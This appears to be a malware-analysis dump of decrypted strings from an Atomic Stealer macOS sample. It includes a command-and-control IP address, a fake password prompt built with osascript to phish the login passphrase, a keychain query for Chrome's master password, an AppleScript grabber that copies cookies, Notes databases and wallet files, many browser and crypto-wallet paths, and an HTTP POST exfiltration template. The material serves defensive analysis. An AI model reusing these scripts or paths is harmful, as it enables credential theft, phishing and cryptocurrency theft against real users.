atomic_stealer_decrypted_strings_4ac7d15c8a397cd68ba9e7166b2e356175761bf4580d0e03e3db994c3ceda3fa.txt
[*] Decrypted String at 0x10003DFCA with key 0x77: 5.42.65.114
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-sto
[*] Decrypted String at 0x10003D02A with key 0x11: .DS_Store
[*] Decrypted String at 0x10003D042 with key 0x11: Partitions
[*] Decrypted String at 0x10003D05A with key 0x38: Code Cache
[*] Decrypted String at 0x10003D072 with key 0xc5: dscl . authonly "
[*] Decrypted String at 0x10003D092 with key 0xc5: osascript -e 'display dialog "Required Application Helper. Please enter passphrase for
[*] Decrypted String at 0x10003D0FA with key 0xea: ." default answer "" with icon caution buttons {"Continue"} default button "Continue" giving up after 150 with title "Application wants to install helper" with hidden answer'
[*] Decrypted String at 0x10003D1BA with key 0x7e: /Cookies
[*] Decrypted String at 0x10003D1D2 with key 0x7e: /Network/Cookies
[*] Decrypted String at 0x10003D1F2 with key 0xa1: /Login Data
[*] Decrypted String at 0x10003D20A with key 0xa1: /Web Data
[*] Decrypted String at 0x10003DE22 with key 0x51: Chromium/
[*] Decrypted String at 0x10003DE3A with key 0x92: Snapshots
[*] Decrypted String at 0x10003DE52 with key 0x3e: /Local Extension Settings/
[*] Decrypted String at 0x10003DE7A with key 0x3e: /cookies.sqlite
[*] Decrypted String at 0x10003DE9A with key 0x8d: /formhistory.sqlite
[*] Decrypted String at 0x10003DEBA with key 0x8d: /key4.db
[*] Decrypted String at 0x10003DED2 with key 0xa2: /logins.json
[*] Decrypted String at 0x10003DEEA with key 0xef: security 2>&1 > /dev/null find-generic-password -ga 'Chrome' | awk '{print $2}'
[*] Decrypted String at 0x10003DF4A with key 0xef: masterpass-chrome
[*] Decrypted String at 0x10003DF6A with key 0xb: POST /p2p HTTP/1.1
Host:
[*] Decrypted String at 0x10003DF92 with key 0xb: :80
uuid:
[*] Decrypted String at 0x10003DFAA with key 0x56:
Content-Length:
[*] Decrypted String at 0x10003DFE2 with key 0x77: osascript -e 'set destinationFolderPath to (path to home folder as text) & "fg:"
set extensionsList to {"txt","png","jpg","jpeg","wallet","keys","key"}
set bankSize to 0
tell application "Finder"
set username to short user name of (system info)
try
[*] Decrypted String at 0x10003E0FA with key 0xc0: if not (exists folder destinationFolderPath) then
make new folder at (path to home folder) with properties {name:"fg"}
end if
set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing
end try
set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
[*] Decrypted String at 0x10003E33A with key 0xc0: set notesFolder to folder notesFolderPath
set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder
repeat with aFile in notesFiles
set fileSize to size of aFile
if (bankSize + fileSize) < 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + fileSize
end try
else
exit repeat
end if
end repeat
[*] Decrypted String at 0x10003E5CA with key 0xd4: end try
set desktopFiles to every file of desktop
set documentsFiles to every file of folder "Documents" of (path to home folder)
repeat with aFile in (desktopFiles & documentsFiles)
set fileExtension to name extension of aFile
if fileExtension is in extensionsList then
set fileSize to size of aFile
if (bankSize + fileSize) < 10 * 1024 * 1024 then
try
duplicate aFile to folder destinationFolderPath with replacing
set bankSize to bankSize + fileSize
end try
else
exit repeat
end if
end if
end repeat
end try
end tell'
[*] Decrypted String at 0x10003E8EA with key 0x2c: FileGrabber/
[*] Decrypted String at 0x10003E902 with key 0x29: system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
[*] Decrypted String at 0x10003E95A with key 0x7e: /Library/Application Support/
[*] Decrypted String at 0x10003E982 with key 0x7e: /Library/Cookies/Cookies.binarycookies
[*] Decrypted String at 0x10003E9BA with key 0x81: safari/saf1
[*] Decrypted String at 0x10003E9D2 with key 0x81: /.config/filezilla/recentservers.xml
[*] Decrypted String at 0x10003EA02 with key 0xd4: FileZilla/recentservers.xml
[*] Decrypted String at 0x10003EA2A with key 0xd4: Chrome
[*] Decrypted String at 0x10003EA42 with key 0xdd: Google/Chrome/
[*] Decrypted String at 0x10003EA62 with key 0x2f: BraveSoftware/Brave-Browser/
[*] Decrypted String at 0x10003EA8A with key 0xab: Microsoft Edge/
[*] Decrypted String at 0x10003EAAA with key 0xb: com.operasoftware.Opera/
[*] Decrypted String at 0x10003EAD2 with key 0xef: com.operasoftware.OperaGX/
[*] Decrypted String at 0x10003EAFA with key 0x4d: Vivaldi/
[*] Decrypted String at 0x10003EB12 with key 0x38: /Library/Application Support/
[*] Decrypted String at 0x10003EB3A with key 0x38: Firefox/Profiles/
[*] Decrypted String at 0x10003EB5A with key 0x93: /Library/Keychains/login.keychain-db
[*] Decrypted String at 0x10003EB8A with key 0x93: keychain
[*] Decrypted String at 0x10003EBA2 with key 0x84: Binance/app-store.json
[*] Decrypted String at 0x10003EBCA with key 0x84: deskwallets/Binance/app-store.json
[*] Decrypted String at 0x10003EBFA with key 0xdd: deskwallets/Electrum/
[*] Decrypted String at 0x10003EC1A with key 0xdd: /.electrum/wallets/
[*] Decrypted String at 0x10003EC3A with key 0xc2: deskwallets/Coinomi/
[*] Decrypted String at 0x10003EC5A with key 0xc2: Coinomi/wallets/
[*] Decrypted String at 0x10003EC7A with key 0x2a: deskwallets/Exodus/
[*] Decrypted String at 0x10003EC9A with key 0xf6: deskwallets/Atomic/
[*] Decrypted String at 0x10003ECBA with key 0xf6: atomic/Local Storage/leveldb/
[*] Decrypted String at 0x10003ECE2 with key 0x5c: tell application
[*] Decrypted String at 0x10003ED02 with key 0x5c: "Terminal" to close first